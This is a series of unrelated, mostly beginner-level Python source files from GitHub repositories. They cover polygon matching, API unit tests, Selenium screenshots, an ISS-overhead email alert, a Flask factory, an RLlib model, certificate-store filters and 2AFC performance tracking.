Mile Stone 6\r\n\r\nimport math\r\nimport numpy as np\r\n\r\ndef write_file(coordinates):\r\n with open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\output6.txt','a',newline='') as file:\r\n file.write('boundary \\n')\r\n file.write('layer 1 \\n')\r\n file.write('datatype 0 \\n')\r\n file.write('xy '+ ' '.join([str(elem) for elem in coordinates]) +' \\n')\r\n file.write('endel\\n')\r\n file.close()\r\n\r\n\r\ndef Input_file():\r\n data=[]\r\n file=open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\Source.txt','r')\r\n for line in file: \r\n word=line.split()\r\n data.append(word)\r\n return data\r\n\r\n\r\ndef validattion_file():\r\n data=[]\r\n valid_corodinates=[]\r\n file=open('E:\\KLA Hackathon 2023\\Milestone_Input\\Milestone 6\\POI.txt','r')\r\n for line in file: \r\n word=line.split()\r\n data.append(word)\r\n \r\n for i in data:\r\n if('xy' in i):\r\n valid_corodinates.append(i)\r\n\r\n return valid_corodinates\r\n\r\n\r\ndef parse_data(data):\r\n coordinates=[]\r\n layers=[]\r\n datatype=[]\r\n\r\n for i in data:\r\n if('xy' in i):\r\n coordinates.append(i)\r\n if('layer' in i):\r\n layers.append(i)\r\n if('datatype' in i):\r\n datatype.append(i)\r\n\r\n return coordinates\r\n\r\n\r\ndef area(lst):\r\n lst=lst[2:]\r\n lst = [eval(i) for i in lst]\r\n x=[]\r\n y=[]\r\n \r\n for i in range(len(lst)):\r\n if(i%2==0):\r\n x.append(lst[i])\r\n else:\r\n y.append(lst[i])\r\n\r\n area=0.5*(np.abs(np.dot(x,np.roll(y,1))-np.dot(y,np.roll(x,1))))\r\n\r\n return area\r\n\r\n\r\n\r\ndef distance(lst):\r\n lst=lst[2:]\r\n lst = [eval(i) for i in lst]\r\n x=[]\r\n y=[]\r\n \r\n for i in range(len(lst)):\r\n if(i%2==0):\r\n x.append(lst[i])\r\n else:\r\n y.append(lst[i])\r\n\r\n res=[]\r\n\r\n for i in range(len(x)-1):\r\n res.append(math.sqrt(((x[i]-y[i])**2)+((x[i+1]-y[i+1])**2)))\r\n\r\n return res\r\n\r\n\r\n\r\ndef validate(cord,valid):\r\n\r\n data=[]\r\n for x,y in zip(cord,valid):\r\n data.append(x//y)\r\n \r\n for i in range(len(data)):\r\n if(data[i]!=data[i+1]):\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef perimeter(cord,valid):\r\n peri1=0\r\n peri2=0\r\n\r\n for x,y in zip(cord,valid):\r\n peri1+=x\r\n peri2+=y\r\n \r\n if(peri1==peri2):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef npangle(lst):\r\n lst=lst[2:]\r\n lst = [eval(i) for i in lst]\r\n x=[]\r\n y=[]\r\n angle=[]\r\n\r\n for i in range(len(lst)):\r\n if(i%2==0):\r\n x.append(lst[i])\r\n else:\r\n y.append(lst[i])\r\n\r\n for i in range(len(x)-2):\r\n ang = math.degrees(math.atan2(y[i+2]-y[i+1], x[i+2]-x[i]) - math.atan2(y[i]-y[i+1], x[i]-x[i+1]))\r\n angle.append(round(ang + 360) if ang < 0 else round(ang))\r\n\r\n return angle\r\n \r\n\r\n\r\ndef angle(lst):\r\n lst=lst[2:]\r\n lst = [eval(i) for i in lst]\r\n x=[]\r\n y=[]\r\n \r\n for i in range(len(lst)):\r\n if(i%2==0):\r\n x.append(lst[i])\r\n else:\r\n y.append(lst[i])\r\n\r\n \r\n numerator=[]\r\n denominator=[]\r\n ratio=[]\r\n anglerad=[]\r\n angledeg=[]\r\n\r\n for i in range(len(x)-2):\r\n numerator.append(y[i+1]*(x[i]-x[i+2])+y[i]*(x[i+2]-x[i+1])+y[i+2]*(x[i+1]-x[i]))\r\n denominator.append((x[i+1]-x[i])*(x[i]+x[i+2])+(y[i+1]-y[i])*(y[i]+y[i+2]))\r\n ratio.append(numerator[i]/denominator[i])\r\n\r\n anglerad.append(math.atan(ratio[i]))\r\n angledeg.append((anglerad[i]*180)/math.pi);\r\n\r\n if(angledeg[i]<0):\r\n angledeg[i] = 180+angledeg[i]\r\n\r\n return angledeg\r\n\r\n\r\ndef check_angle(angle1,angle2):\r\n\r\n cnt=0\r\n\r\n for i in range(len(angle1)):\r\n if(angle1[i]==angle2[i]):\r\n cnt+1\r\n\r\n if(cnt>len(angle1)/2):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\n\r\ndef check_polygon(coord,valid_cord):\r\n result=[]\r\n \r\n valangle=npangle(valid_cord)\r\n valarea=area(valid_cord)\r\n \r\n #print(valangle)\r\n #print(npangle(coord[2]))\r\n\r\n for i in coord:\r\n iangle=angle(i)\r\n iarea=area(i)\r\n if(iarea==valarea):\r\n result.append(i)\r\n elif(iangle==valangle):\r\n result.append(i)\r\n \r\n return result\r\n \r\n \r\n\r\n\r\n\r\ndef main():\r\n data=Input_file()\r\n valid_cord=validattion_file()\r\n coordinates=parse_data(data)\r\n result=check_polygon(coordinates,valid_cord[0])\r\n\r\n print(len(result))\r\n for i in result:\r\n write_file(i[1:])\r\n\r\n\r\nif __name__==\"__main__\":\r\n main()","repo_name":"NavinAananthan/KLA-Tencor-Hackathon","sub_path":"Milestone6.py","file_name":"Milestone6.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44115702209","text":"import unittest\nfrom srm2.common import fcst\nimport time\n\n\n# FCST管理\nclass TestFCSTCase(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n self.obj = fcst.TestFcst()\n print(\"----test_fcst start----\")\n\n # FCST周列表\n def testForcastWeek_success(self):\n msg = self.obj.testForcastWeek()\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST列表查询成功\n def testFCSTlist_success(self):\n msg = self.obj.testFCSTlist()\n msg1 = msg.get('code')\n self.assertEqual(200,msg1,'fail')\n\n # MRP明细查詢成功\n def testMRPlist_success(self):\n msg = self.obj.testMRPlist(forecastWeek='2021年-第10周', forecastVersion='2021030502')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, '')\n\n # 交期回复导入成功\n def testMRPImportFile_success(self):\n filepath = r'D:\\apache-jmeter-5.3\\apache-jmeter-5.3\\testdata\\import.txt'\n with open(filepath,'r') as f:\n filenames = f.readlines()\n # print(filenames)\n for line in filenames:\n filename = line.strip('\\n')\n # print(filename)\n f2 = open(filename, 'rb')\n file = (filename, f2, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n msg = self.obj.testMRPImportFile(file=file, forecastWeek='2021年-第10周', forecastVersion='2021030502')\n print(msg)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, filename + 'fail')\n f2.close()\n\n # FCST明细列表查询成功\n def testForecast_success(self):\n msg = self.obj.testForecast()\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP明细导出成功\n def testMRPDetail_success(self):\n t = time.time()\n msg = self.obj.testMRPDetail(forecastWeek='2021年-第10周',forecastVersion='2021030502',t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP汇总列表查询成功\n def testMRPSum_success(self):\n msg = self.obj.testMRPSum(forecastWeek='2021年-第10周', forecastVersion='2021030502')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP汇总导出成功\n def testMRPExport_success(self):\n t = time.time()\n msg = self.obj.testMRPExport(forecastWeek='2021年-第10周',forecastVersion='2021030502',t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # 导出交期回复数据\n def testMRPAsyncExport_success(self):\n t = time.time()\n msg = self.obj.testMRPAsyncExport(forecastWeek='2021年-第10周', forecastVersion='2021030502', t=t)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # MRP解锁\n def testMRPunlock_success(self):\n msg = self.obj.testMRPunlock(id='')\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST明细列表-确认\n def testForecastConfirm_success(self):\n ids = []\n msg = self.obj.testForecastConfirm(id=ids)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n # FCST明细列表-取消确认\n def testForecastUnconfirm_success(self):\n ids = []\n msg = self.obj.testForecastUnconfirm(id=ids)\n msg1 = msg.get('code')\n self.assertEqual(200, msg1, 'fail')\n\n @classmethod\n def tearDownClass(self):\n print(\"----test_fcst end----\")\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"MiaZhang0/work","sub_path":"srm2/testcases/test_fcst.py","file_name":"test_fcst.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15144953540","text":"#__author:\"longjin\"\n#date: 2019/10/12\n# -*- coding: UTF-8 -*-\n\nfrom selenium import webdriver\nimport os\nfrom time import sleep\n\ndef insert_img(driver, file_name):\n # base = 'E:\\\\python\\\\practice4\\\\framework\\\\report\\\\image\\\\'\n # file_path = base + file_name\n base_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n base_dir = str(base_dir)\n print(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n print(base_dir)\n base = base_dir.split('test_case')[0]\n file_path = base + '/report/image/' + file_name\n driver.get_screenshot_as_file(file_path)\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get('https://www.baidu.com')\n insert_img(driver, 'test_baidu.png')\n # driver.get_screenshot_as_file('E:\\\\python\\\\practice4\\\\framework\\\\report\\\\image\\\\baidu.png')\n sleep(2)\n driver.quit()","repo_name":"ljeleven/mypython","sub_path":"practice4/framework/test/common/screenshot.py","file_name":"screenshot.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28807207989","text":"class OperatingSys():\n\tdef OPeratingSys(self,input_from_user):\n\t\timport platform\n\t\tmy_os=platform.system()\n\t\twith open('myOS.txt','w') as file:\n\t\t\tfile.writelines(str(my_os))\n\t\twith open('myOS.txt','r') as file:\n\t\t\tlines=file.read()\n\t\t\tfirst=lines.split('\\n',1)[0]\n\t\t\tprint(first)\n\t\t\tif(first=='Windows'):\n\t\t\t\timport os\n\t\t\t\tos.system('cls')\n\t\t\telse:\n\t\t\t\timport os\n\t\t\t\tos.system('clear')\n\t\tr=1\n\t\twhile r==1:\n\t\t\ta=input(\"Know Your Operating System\\nDo you want to know your Operating System (Y/N)\")\n\t\t\tif(a=='Y'):\n\t\t\t\timport platform\n\t\t\t\tmy_os=platform.system()\n\t\t\t\twith open('myOS.txt','w') as file:\n\t\t\t\t\tfile.writelines(str(my_os))\n\t\t\t\twith open('myOS.txt','r') as file:\n\t\t\t\t\tlines=file.read()\n\t\t\t\t\tfirst=lines.split('\\n',1)[0]\n\t\t\t\t\tprint(\"Your Operating System is \"+first)\n\t\t\tr=2\n","repo_name":"CryptAdvance/CryptAdvance","sub_path":"operatingsys.py","file_name":"operatingsys.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"803861452","text":"import time\nimport requests\nfrom datetime import datetime\nimport smtplib\n\nMY_LAT = 51.507351 # Your latitude\nMY_LONG = -0.127758 # Your longitude\nMY_EMAIL = \"email@mail.com\"\nMY_PASSWORD = \"password\"\n\n\ndef check_position():\n response = requests.get(url=\"http://api.open-notify.org/iss-now.json\")\n response.raise_for_status()\n data = response.json()\n\n iss_latitude = float(data[\"iss_position\"][\"latitude\"])\n iss_longitude = float(data[\"iss_position\"][\"longitude\"])\n\n # Your position is within +5 or -5 degrees of the ISS position.\n\n if abs(MY_LAT - iss_latitude) <= 5 and abs(MY_LONG - iss_longitude) <= 5:\n return True\n return False\n\n\ndef is_dark():\n parameters = {\n \"lat\": MY_LAT,\n \"lng\": MY_LONG,\n \"formatted\": 0,\n }\n\n response = requests.get(\n \"https://api.sunrise-sunset.org/json\", params=parameters)\n response.raise_for_status()\n data = response.json()\n sunrise = int(data[\"results\"][\"sunrise\"].split(\"T\")[1].split(\":\")[0])\n sunset = int(data[\"results\"][\"sunset\"].split(\"T\")[1].split(\":\")[0])\n\n time_now = datetime.now()\n\n if sunset <= time_now.hour() <= sunrise:\n return True\n return False\n\n\nwhile True:\n time.sleep(60)\n if check_position() and is_dark():\n print(\"look up\")\n with smtplib.SMTP(\"smtp.gmail.com\") as conn:\n conn.starttls()\n conn.login(MY_EMAIL, MY_PASSWORD)\n conn.sendmail(from_addr=MY_EMAIL, to_addrs=MY_EMAIL,\n msg=\"Subject:Look Up\\n\\nThe ISS is above you in the sky.\")\n\n# If the ISS is close to my current position\n# and it is currently dark\n# Then send me an email to tell me to look up.\n# BONUS: run the code every 60 seconds.\n","repo_name":"tloske/100-Days-of-Code-Projects","sub_path":"Day 33/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74110887779","text":"from flask import Flask, render_template\nfrom ._api import factory as api_factory\nfrom ._pages import factory as pages_factory\n\n\ndef app_factory(template_dir, static_dir):\n # initalizing the application\n app = Flask(\n __name__,\n static_folder=static_dir,\n template_folder=template_dir,\n )\n\n # creating the main route to the application\n @app.route(\"/\", methods=[\"GET\"])\n def main():\n return render_template(\"index.html\")\n\n # registering the api context to the application\n api_factory(app)\n\n # registering the blueprint context to the application\n pages_factory(app)\n\n # returning out the application\n return app\n\n\n# running the application in debug mode\nif __name__ == \"__main__\":\n app = app_factory()\n app.run(debug=True)\n","repo_name":"JacobBas/flask-preact-linear-regression","sub_path":"backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6338202893","text":"edad = 56\n\nif edad < 30:\n if edad < 15:\n print(\"Eres un niño\")\n else:\n print(\"Eres un joven\")\nelse:\n if edad < 45:\n print(\"Ya no eres tan joven\")\n else:\n print(\"Decididamente ya no eres joven\")\n","repo_name":"jocarsa/python311","sub_path":"001-Ejercicio 1/008-Estructuras de control/002-condicional/003-anidacion.py","file_name":"003-anidacion.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37526856561","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\n\ndef split_my_data(df, train_pct):\n '''\n Takes in df, train_pct and returns 2 items:\n train, test\n\n When using this function, in order to have usable datasets, be sure to call it thusly:\n train, test = split_my_data(df, train_pct)\n '''\n return train_test_split(df, train_size = train_pct, random_state = 294)\n\n#### Handle Nulls Function ####\ndef handle_nulls(df):\n df.total_charges = df['total_charges'].fillna(df['monthly_charges'])\n return df\n\n#### Encoder Functions ####\ndef payment_type(df):\n df['pay_elec_check'] = np.where(df.payment_type == 'Electronic check', 1, 0)\n df['pay_mail'] = np.where(df.payment_type == 'Mailed check', 1, 0)\n df['pay_bank'] = np.where(df.payment_type == 'Bank transfer (automatic)', 1, 0)\n df['pay_cc'] = np.where(df.payment_type == 'Credit card (automatic)', 1, 0)\n df['pay_auto'] = np.where(df.payment_type == 'Credit card (automatic)', 1,\n np.where(df.payment_type == 'Bank transfer (automatic)', 1, 0))\n return df\n\ndef boolean_labeler(df, col):\n le = preprocessing.LabelEncoder()\n df[f'{col}_enc'] = le.fit_transform(df[col])\n return df\n\ndef more_than_two_labels(df, col):\n df[f'{col}_enc'] = np.where(df[col] == 'No', 0,\n np.where(df[col] == 'Yes', 1, 0))\n return df\n\n#### New Feature Functions ####\ndef months_to_years(df, col):\n df[f'{col}_years'] = (df[col] / 12).round(2)\n return df\n\ndef extra_lines(df):\n df['extra_lines'] = np.where(df['multiple_lines'] == 'Yes', 2,\n np.where(df['multiple_lines'] == 'No', 1, 0))\n return df\n\ndef family_support(df):\n df['family_support'] = np.where( (df['partner'] == 'No') & (df['dependents'] == 'Yes'), 3,\n np.where( (df['partner'] == 'Yes') & (df['dependents'] == 'Yes'), 2,\n np.where( (df['partner'] == 'Yes') & (df['dependents'] == 'No'), 1, 0)))\n return df\n\ndef has_internet(df):\n df['has_internet'] = np.where(df.internet_service_type_id == 3, 0, 1)\n return df\n\ndef internet_services(df):\n df['internet_services'] = (df.has_internet + \n df.online_security_enc + \n df.online_backup_enc + \n df.tech_support_enc + \n df.streaming_tv_enc + \n df.streaming_movies_enc + \n df.device_protection_enc)\n return df\n\n#### Scaler Function ####\ndef uniform_scaler(train, valid, test):\n '''\n Uses the train, valid & test datasets created by the split_my_data function\n First, make new dfs containing only those columns you want scaled, else this function will scale every numerical value, including booleans.\n\n This is a non-linear transformer, and it smooths out unusual distributions.\n It spreads out the most frequent values and reduces the impact of (marginal) outliers, therefore it is robust.\n It distorts correlations and distances within and across features.\n\n '''\n unf_scaler = preprocessing.QuantileTransformer(n_quantiles=100, output_distribution='normal', random_state=123, copy=True).fit(train)\n train = pd.DataFrame(unf_scaler.transform(train), columns=train.columns.values).set_index([train.index.values])\n valid = pd.DataFrame(unf_scaler.transform(valid), columns=valid.columns.values).set_index([valid.index.values])\n test = pd.DataFrame(unf_scaler.transform(test), columns=test.columns.values).set_index([test.index.values])\n return unf_scaler, train, valid, test\n","repo_name":"team-db-telco/telco-classification-project","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74870763300","text":"from ray.rllib.models.modelv2 import ModelV2\nfrom ray.rllib.models.tf.recurrent_tf_modelv2 import RecurrentTFModelV2\nfrom ray.rllib.policy.rnn_sequencing import add_time_dimension\nfrom ray.rllib.utils import try_import_tf\nfrom ray.rllib.utils.annotations import override\n\nfrom models.actor_critic_lstm import ActorCriticLSTM\nfrom models.common_layers import build_conv_layers, build_fc_layers\n\ntf = try_import_tf()\n\n\nclass BaselineModel(RecurrentTFModelV2):\n def __init__(self, obs_space, action_space, num_outputs, model_config, name):\n \"\"\"\n The baseline model without social influence from the social influence paper.\n :param obs_space: The observation space shape.\n :param action_space: The amount of available actions to this agent.\n :param num_outputs: The amount of available actions to this agent.\n :param model_config: The model config dict. Used to determine size of conv and fc layers.\n :param name: The model name.\n \"\"\"\n super(BaselineModel, self).__init__(obs_space, action_space, num_outputs, model_config, name)\n\n self.obs_space = obs_space\n self.num_outputs = num_outputs\n\n original_obs_dims = obs_space.original_space.spaces[\"curr_obs\"].shape\n # Determine vision network input shape: add an extra none for the time dimension\n inputs = tf.keras.layers.Input(shape=original_obs_dims, name=\"observations\", dtype=tf.uint8)\n\n # Divide by 255 to transform [0,255] uint8 rgb pixel values to [0,1] float32.\n last_layer = tf.keras.backend.cast(inputs, tf.float32)\n last_layer = tf.math.divide(last_layer, 255.0)\n\n # Build the CNN layers\n last_layer = build_conv_layers(model_config, last_layer)\n\n # Add the fully connected layers\n last_layer = build_fc_layers(model_config, last_layer, name)\n\n self.encoder_model = tf.keras.Model(inputs, [last_layer], name=\"Baseline_Encoder_Model\")\n self.register_variables(self.encoder_model.variables)\n self.encoder_model.summary()\n\n # Action selection/value function\n cell_size = model_config[\"custom_options\"].get(\"cell_size\")\n self.policy_model = ActorCriticLSTM(\n last_layer.shape[-1],\n action_space,\n num_outputs,\n model_config,\n \"policy\",\n cell_size=cell_size,\n )\n\n self.register_variables(self.policy_model.rnn_model.variables)\n self.policy_model.rnn_model.summary()\n\n @override(ModelV2)\n def forward(self, input_dict, state, seq_lens):\n \"\"\"\n Evaluate the model.\n Adds time dimension to batch before sending inputs to forward_rnn()\n :param input_dict: The input tensors.\n :param state: The model state.\n :param seq_lens: LSTM sequence lengths.\n :return: The policy logits and state.\n \"\"\"\n trunk = self.encoder_model(input_dict[\"obs\"][\"curr_obs\"])\n new_dict = {\"curr_obs\": add_time_dimension(trunk, seq_lens)}\n\n output, new_state = self.forward_rnn(new_dict, state, seq_lens)\n return tf.reshape(output, [-1, self.num_outputs]), new_state\n\n def forward_rnn(self, input_dict, state, seq_lens):\n \"\"\"\n Forward pass through the LSTM.\n Implicitly assigns the value function output to self_value_out, and does not return this.\n :param input_dict: The input tensors.\n :param state: The model state.\n :param seq_lens: LSTM sequence lengths.\n :return: The policy logits and new state.\n \"\"\"\n h1, c1 = state\n\n # Compute the next action\n (\n self._model_out,\n self._value_out,\n output_h1,\n output_c1,\n ) = self.policy_model.forward_rnn(input_dict, [h1, c1], seq_lens)\n\n return self._model_out, [output_h1, output_c1]\n\n def action_logits(self):\n \"\"\"\n :return: The action logits from the latest forward pass.\n \"\"\"\n return self._model_out\n\n def value_function(self):\n \"\"\"\n :return: The value function result from the latest forward pass.\n \"\"\"\n return tf.reshape(self._value_out, [-1])\n\n @override(ModelV2)\n def get_initial_state(self):\n \"\"\"\n :return: Initial state of this model. This model only has LSTM state from the policy_model.\n \"\"\"\n return self.policy_model.get_initial_state()\n","repo_name":"eugenevinitsky/sequential_social_dilemma_games","sub_path":"models/baseline_model.py","file_name":"baseline_model.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","stars":354,"dataset":"github-code","pt":"35"} +{"seq_id":"5541997978","text":"from certificate import *\nfrom chandlerdb.item.Item import Item\n\nclass TrustedCACertsFilter(Item):\n def isTrustedCACert(self, view, uuid):\n purpose, trust = view.findValues(uuid, ('purpose', 0), ('trust', 0))\n return purpose & constants.PURPOSE_CA and \\\n trust & constants.TRUST_AUTHENTICITY | constants.TRUST_SERVER\n\nclass TrustedServerCertsFilter(Item):\n def isTrustedServerCert(self, view, uuid):\n purpose, trust = view.findValues(uuid, ('purpose', 0), ('trust', 0))\n return purpose & constants.PURPOSE_SERVER and \\\n trust & constants.TRUST_AUTHENTICITY\n\ndef installParcel(parcel, oldVersion=None):\n # load our subparcels\n from application import schema\n schema.synchronize(parcel.itsView, \"osaf.framework.certstore.data\")\n schema.synchronize(parcel.itsView, \"osaf.framework.certstore.blocks\")\n\n from osaf.pim.collections import FilteredCollection\n import certificate, utils\n\n FilteredCollection.update(parcel, 'sslCertificateQuery',\n source=utils.getExtent(certificate.Certificate, parcel.itsView),\n filterMethod=(TrustedCACertsFilter(None, parcel), 'isTrustedCACert'),\n filterAttributes=['purpose', 'trust']\n )\n \n FilteredCollection.update(parcel, 'sslTrustedServerCertificatesQuery',\n source=utils.getExtent(certificate.Certificate, parcel.itsView),\n filterMethod=(TrustedServerCertsFilter(None, parcel),\n 'isTrustedServerCert'),\n filterAttributes=['purpose', 'trust']\n )\n","repo_name":"owenmorris/chandler","sub_path":"chandler/parcels/osaf/framework/certstore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"35"} +{"seq_id":"11404419770","text":"from __future__ import absolute_import, division\n\nfrom collections import OrderedDict\n\nfrom . import utils\n\nclass DefaultPerformance(object):\n def __init__(self):\n pass\n\n def update(self, trial, status):\n pass\n\n def display(output=True):\n pass\n\nclass Performance2AFC(object):\n def __init__(self):\n self.decisions = []\n self.corrects = []\n self.choices = []\n self.t_choices = []\n #self.rewards = []\n\n def update(self, trial, status):\n #self.rewards.append(reward)\n if 'correct' in status:\n self.decisions.append(True)\n self.corrects.append(status['correct'])\n if 'choice' in status:\n self.choices.append(status['choice'])\n else:\n self.choices.append(None)\n if 't_choice' in status:\n self.t_choices.append(status['t_choice'])\n else:\n self.t_choices.append(None)\n else:\n self.decisions.append(False)\n self.corrects.append(False)\n self.choices.append(None)\n self.t_choices.append(None)\n\n @property\n def n_trials(self):\n return len(self.decisions)\n\n @property\n def n_decision(self):\n return sum(self.decisions)\n\n @property\n def n_correct(self):\n return sum(self.corrects)\n\n def display(self, output=True):\n n_trials = self.n_trials\n n_decision = self.n_decision\n n_correct = self.n_correct\n\n items = OrderedDict()\n items['P(choice)'] = '{}/{} = {:.3f}'.format(n_decision, n_trials,\n n_decision/n_trials)\n if n_decision > 0:\n items['P(correct|choice)'] = '{}/{} = {:.3f}'.format(n_correct, n_decision,\n n_correct/n_decision)\n\n if output:\n utils.print_dict(items)\n return items\n\nclass PerformancePostdecisionWager(object):\n def __init__(self):\n self.wagers = []\n self.corrects = []\n self.choices = []\n self.t_choices = []\n\n def update(self, trial, status):\n self.wagers.append(trial['wager'])\n self.corrects.append(status.get('correct'))\n self.choices.append(status.get('choice'))\n self.t_choices.append(status.get('t_choice'))\n\n @property\n def n_correct(self):\n return sum([c for c in self.corrects if c is not None])\n\n @property\n def n_sure_decision(self):\n return len([1 for w, c in zip(self.wagers, self.choices) if w and c is not None])\n\n @property\n def n_trials(self):\n return len(self.choices)\n\n @property\n def n_decision(self):\n return len([1 for c in self.choices if c in ['L', 'R']])\n\n @property\n def n_sure(self):\n return len([1 for c in self.choices if c == 'S'])\n\n @property\n def n_answer(self):\n return len([1 for c in self.choices if c is not None])\n\n @property\n def n_wager(self):\n return sum(self.wagers)\n\n def display(self, output=True):\n n_trials = self.n_trials\n n_decision = self.n_decision\n n_correct = self.n_correct\n n_sure_decision = self.n_sure_decision\n n_sure = self.n_sure\n n_answer = self.n_answer\n n_wager = self.n_wager\n\n items = OrderedDict()\n items['P(answer)'] = '{}/{} = {:.3f}'.format(n_answer, n_trials,\n n_answer/n_trials)\n items['P(decision)'] = '{}/{} = {:.3f}'.format(n_decision, n_trials,\n n_decision/n_trials)\n if n_decision > 0:\n items['P(correct|decision)'] = '{}/{} = {:.3f}'.format(n_correct, n_decision,\n n_correct/n_decision)\n items['P(wager trials)'] = '{}/{} = {:.3f}'.format(n_wager, n_trials,\n n_wager/n_trials)\n if n_sure_decision > 0:\n items['P(sure)'] = '{}/{} = {:.3f}'.format(n_sure, n_sure_decision,\n n_sure/n_sure_decision)\n\n if output:\n utils.print_dict(items)\n return items\n","repo_name":"frsong/pyrl","sub_path":"pyrl/performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"1231926654","text":"# -*-coding:utf-8-*-\n# @Time :2023/10/2415:14\n# @Author :Ervin Chiu\n# @Email :ErvinChiu@outlook.com\n# @File :api_demo.py\n# @Software:PyCharm\n\nimport requests\n\n# get 请求\n\n#res = requests.get(\"https://www.baidu.com\")\n#print(res)\n#print(res.request.headers)\n# print(res.status_code)\n\n# http://150.109.156.47:8000/api/get_event_list/?eid=3\n\n\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"3\"}\n# res = requests.get(url, param)\n# print(res.json())\n\n\nimport unittest\n\nfrom http_request import HttpRequest\n\nfrom ddt import ddt, data\n\nfrom do_excel import DoExcel\n\n#\n# class TestHttpRequest(unittest.TestCase):\n#\n# def test_case_00(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"1\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"第1条用例的执行结果是:{0}\".format(res.json()))\n#\n# def test_case_01(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"2\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"第2条用例的执行结果是:{0}\".format(res.json()))\n#\n# def test_case_02(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"3\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"第3条用例的执行结果是:{0}\".format(res.json()))\n#\n# def test_case_03(self):\n# url = \"http://150.109.156.47:8000/api/get_event_list\"\n# param = {\"eid\": \"6\"}\n# res = HttpRequest(url, param).http_request(\"get\")\n# print(\"第4条用例的执行结果是:{0}\".format(res.json()))\n#\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\n# test_data = [{\"id\":\"1\",\"url\": \"http://150.109.156.47:8000/api/get_event_list\", \"params\": {\"eid\": \"1\"}, \"method\": \"get\"},\n# {\"id\":\"2\",\"url\": \"http://150.109.156.47:8000/api/get_event_list\", \"params\": {\"eid\": \"2\"}, \"method\": \"get\"},\n# {\"id\":\"3\",\"url\": 'http://150.109.156.47:8000/api/get_event_list', 'params': {'eid': \"3\"}, \"method\": \"get\"}]\n# #\n#\n# @ddt\n# class TestHttpRequest(unittest.TestCase):\n#\n# @data(*test_data)\n# def test_case_01(self, data_item):\n# print(\"**********\" * 10)\n# print(\"ddt 分解出来的数据是:{0}\".format(data_item))\n#\n# res = HttpRequest(data_item[\"url\"], data_item[\"param\"]).http_request(data_item[\"method\"])\n# print(\"第一条用例的执行结果是{0}\".format(res.json()))\n#\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\ntest_data = DoExcel(\"data.xlsx\", \"Sheet1\").do_excel()\n\n\n@ddt\nclass TestHttpRequest(unittest.TestCase):\n def setUp(self) -> None:\n self.t = DoExcel(\"data.xlsx\", \"Sheet1\")\n\n @data(*test_data)\n def test_case_01(self, data_item):\n print(\"**********\" * 20)\n print(\"ddt 分解出来的数据是:{0}\".format(data_item))\n\n res = HttpRequest(data_item[\"url\"], eval(data_item[\"params\"])).http_request(data_item[\"method\"])\n print(\"第{1}条用例执行结果是{0}\".format(res.json(),data_item[\"id\"]))\n try:\n self.assertEqual(res.json()[\"status\"], 10200)\n\n\n test_result = \"Pass\"\n except AssertionError as e:\n print(\"执行接口测试出错,错误是{0}\".format(e))\n\n test_result = \"Fail\"\n # raise e\n\n finally:\n self.t.write_back(data_item[\"id\"] + 1, 7, str(res.json()))\n 